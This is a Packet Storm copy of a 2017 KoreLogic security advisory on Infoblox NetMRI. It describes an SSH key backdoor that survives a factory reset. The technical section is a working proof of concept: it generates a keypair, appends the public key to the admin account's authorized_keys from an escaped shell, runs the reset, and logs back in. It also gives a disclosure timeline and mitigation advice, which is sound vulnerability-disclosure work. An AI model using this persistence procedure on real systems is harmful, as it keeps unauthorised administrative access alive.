Exploit the possiblities

Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence

Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence
Posted Oct 25, 2017
Authored by Matthew Bergin | Site korelogic.com

Infoblox NetMRI version VM-AD30-5C6CE suffers from an administration shell factory reset persistence vulnerability.

tags | exploit, shell
MD5 | 3d645a515c1de250781ae9cab7fd9d5c

Infoblox NetMRI VM-AD30-5C6CE Factory Reset Persistence

Change Mirror Download
KL-001-2017-018 : Infoblox NetMRI Administration Shell Factory Reset Persistence

Title: Infoblox NetMRI Administration Shell Factory Reset Persistence
Advisory ID: KL-001-2017-018
Publication Date: 2017.10.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-018.txt


1. Vulnerability Details

Affected Vendor: Infoblox
Affected Product: NetMRI
Affected Version: VM-AD30-5C6CE
Platform: Embedded Linux
CWE Classification: CWE-485: Insufficient Encapsulation
Impact: Administrative Account Backdoor
Attack vector: SSH

2. Vulnerability Description

An authenticated user who has escaped the management shell
can install a public SSH key which will survive factory resets.

3. Technical Description

1. Create a SSH keypair.

$ ssh-keygen -f netrmi-backdoor
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in netrmi-backdoor.
Your public key has been saved in netrmi-backdoor.pub.
The key fingerprint is:
1e:d6:55:7b:f6:a1:a5:9f:ea:8d:2b:4d:5d:ae:9e:19 fake@fake
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| . . |
| . .oo|
| . . +o+|
| S . o..o|
| o . ...o|
| . o E+ |
| . .=+ |
| o*=. |
+-----------------+

2. As 'admin' from a escaped shell, echo the public key to authorized_keys.

[admin@NetMRI-VM-AD30-5C6CE ~]$ echo ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDmjcavayYmGgsNUggeILWSw8qGKAZeWkH/01oP/1M8d249zYBJRHri0hJn13DItuOCn/1/RWxFQsUtoph2dHsAnOYPZXEXofPfmWbqOdaOOK+TbrMAgc0CdgKtIDE01LHob4S8s4N//jCHGWUQzv5KAUebRUtR1K7STAQdMnKbhZeoUBoVgvekjnZZ+3gFGg6C7FDg3Z8VstWYJmqxo7N4awEI95fnJ551O4sr9owdIwoZ5OhO0cbt8HGzoCsdbinICKUg3CIhfnmLnNfHtySmBf6srFx7QQ3Gy5lmW7nXNEYrDoXc37H+mpSR0rtPtuWr9GolP9ccHbbIyQXL6frV
fake@fake >> /home/admin/.ssh/authorized_keys
[admin@NetMRI-VM-AD30-5C6CE ~]$ exit
exit
[admin@NetMRI-VM-AD30-5C6CE Backup]$ exit
exit
ping: IDN encoding of '' failed with error code 5

3. Factory reset the system using the management shell.

NetMRI-VM-AD30-5C6CE> ?

Available Commands:
acl ftp md5sum register setup
autoupdate grep more remoteCopy show
cat halt netstat removedsb snmpwalk
clear help ping removemib ssh-key
configure installdsb provisiondisk repair supportbundle
debug installhelpfiles quit reset telnet
deregister installmib rdtclient restore tftpsync
diagnostic license reboot rm top
exit ls recalculate-spm route traceroute
export maintenance refreshgroups set

NetMRI-VM-AD30-5C6CE> reset

Reset Commands:
admin cli snmp tunclient
all_licenses database system

NetMRI-VM-AD30-5C6CE> reset system

*******************************************************************
WARNING WARNING WARNING WARNING WARNING

This script deletes the network database, all database archive
files, all server logs, all issue details, all files stored
in the administrator shell directory and all user logins.
This script also resets the administrator password to 'admin'
and erases all customer-specific configuration information.

WARNING WARNING WARNING WARNING WARNING
*******************************************************************

Do you really want to reset (y|n)? [n]y

+++ Stopping Server ...
+++ Clearing MQ data ...
+++ Removing Server Logs ...
+++ Removing User Logins ...
+++ Resetting Admin Password ...
+++ Clearing Network Database ...
+++ Clearing All Config Files ...
+++ Clearing subscribers and subscriptions ...
+++ Clearing reports ...
+++ Clearing device support bundles ...
+++ Removing Certificates ...
+++ Rebuilding database ...
+++ Restoring pre-packaged policies ...
+++ Resetting Server Configuration ...
Server is down, skipping comm server restart
+++ Installing Weekly Maintenance Process ...
+++ Resetting Server Name ...
+++ Resetting Banner Logo ...
+++ Resetting Network Interfaces ...
+++ Processing Interface eth0 ...
+++ Processing Interface eth1 ...
+++ Processing Interface eth2 ...
+++ Processing Interface eth3 ...
+++ Resetting DNS Configuration ...
+++ Clearing Admin Directory ...
+++ Resetting Firewall Settings ...
+++ Resetting Time Zone ...
+++ Resetting Security Settings ...

#############################################################
The system needs to be rebooted to complete the reset process
#############################################################

Enter 'reboot' or 'halt' [reboot]: reboot
+++ Reset Complete

+++ Rebooting System ...

Broadcast message from admin@NetMRI-VM-AD30-5C6CE on pts/0 (Mon, 13 Mar 2017 18:59:02 -0400):

The system is going down for reboot NOW!

Connection to 1.3.3.7 closed by remote host.

4. Login to the system using the private key.

$ ssh -i netrmi-backdoor admin@1.3.3.7
NetMRI VM-AD30-5C6CE
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM EXTENT ALLOWED BY APPLICABLE LAWS.
Last login: Mon Mar 13 17:00:07 2017 from 1.3.3.7

************************************************************************
ALL UNAUTHORIZED ACCESS TO THIS SYSTEM WILL BE PROSECUTED TO THE MAXIMUM
EXTENT ALLOWED BY APPLICABLE LAWS.
************************************************************************

NetMRI Administrative Shell
---------------------------

Available Commands:
acl ftp md5sum register setup
autoupdate grep more remoteCopy show
cat halt netstat removedsb snmpwalk
clear help ping removemib ssh-key
configure installdsb provisiondisk repair supportbundle
debug installhelpfiles quit reset telnet
deregister installmib rdtclient restore tftpsync
diagnostic license reboot rm top
exit ls recalculate-spm route traceroute
export maintenance refreshgroups set

NetMRI-VM-AD30-5C6CE>

4. Mitigation and Remediation Recommendation

There is no known remediation for this vulnerability from the
vendor. Administrators should heavily restrict access to any
account of any privilege which can use the ping command in
the NetMRI CLI.

Network access to management interfaces should be properly segmented.

Assuming the lack of input sanitation in the NetMRI CLI is not
addressed: Use that vulnerability to check for the existence
any SSH keys. No keys should be present.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.07.21 - KoreLogic requests security contact and PGP key from
Infoblox.
2017.07.21 - Infoblox suggests 'security_support@infoblox.com' with
PGP key id 0xC4AB2799.
2017.07.24 - KoreLogic submits vulnerability information to Infoblox.
2017.07.31 - 5 business days have elapsed since the vulnerability
was reported. No response from Infoblox.
2017.09.15 - KoreLogic requests update from Infoblox.
2017.09.26 - 45 business days have elapsed since the vulnerability
was reported to Infoblox.
2017.10.17 - KoreLogic requests an update from Infoblox.
2017.10.18 - 60 business days have elapsed since the vulnerability
was reported to Infoblox.
2017.10.24 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    15 Files
  • 2
    Dec 2nd
    2 Files
  • 3
    Dec 3rd
    1 Files
  • 4
    Dec 4th
    15 Files
  • 5
    Dec 5th
    15 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    17 Files
  • 8
    Dec 8th
    15 Files
  • 9
    Dec 9th
    13 Files
  • 10
    Dec 10th
    4 Files
  • 11
    Dec 11th
    41 Files
  • 12
    Dec 12th
    44 Files
  • 13
    Dec 13th
    25 Files
  • 14
    Dec 14th
    10 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close